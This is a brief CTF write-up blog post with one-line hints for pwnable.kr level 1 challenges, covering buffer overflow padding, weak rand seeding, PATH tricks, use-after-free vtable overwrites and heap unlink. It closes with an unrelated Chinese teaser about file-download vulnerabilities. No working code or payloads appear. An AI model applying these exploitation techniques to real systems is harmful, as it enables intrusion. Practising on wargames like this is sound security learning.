Pwnable.kr Level 1 Writeup
Last updated:Mar.23, 2017 CST 23:47:23
Just make some notes. Totally used about 24 hours.
The admin said that the writeup of other levels should not be shared...But it will not affect me yet, since I haven't do them yet ;).
Just use perl
Notice, the padding should be 52, not 32. And your terminal emulator might do bad things....
RCE. So easy. Unpack manually and break at memcpy.
How to override fflush()?
Try to learn something about rand() and srand()...
Complex. But just try... Kind of boring.
You need to see how the ARM fetch instructions. Interestring!
Time to print an priority table of C, and paste on your laptop.
Just normal things. Nothing to mention about it.
good practice for the algo
Another example of wrong type
cmd1 and cmd2
Many solutions are using PATH. But I love vim.
Block size is 0x18 bytes, so we need to free and get two 18 bytes block via the second option, which means the previous two blocks can be written. We can write a fake vTable address and modify the function pointer.
At least two available solutions:
- Write a debugger snippet to check parameters and return values of malloc
- Use "Heap Analyzer" in the Visual Studio
If you got a SIGSEV, it might be caused by unaligned memory. Try to solve it. Notice that the management structure also took some space.
Simple. Learn to use pwntools.
Looks like ptmalloc unlink. But site admin's solution is interestring.
FROM :blog.iret.xyz | Author:blog.iret.xyz
文件下载漏洞概述文件下载功能在很多web系统上都会出现，一般我们当点击下载链接，便会向后台发送一个下载请求，一般这个请求会包含一个需要下载的文件名称，后台在收到请求后 会开始执行下载代码，将该文件名对应的文件response给浏览器，从而完成下载。 如果后台在…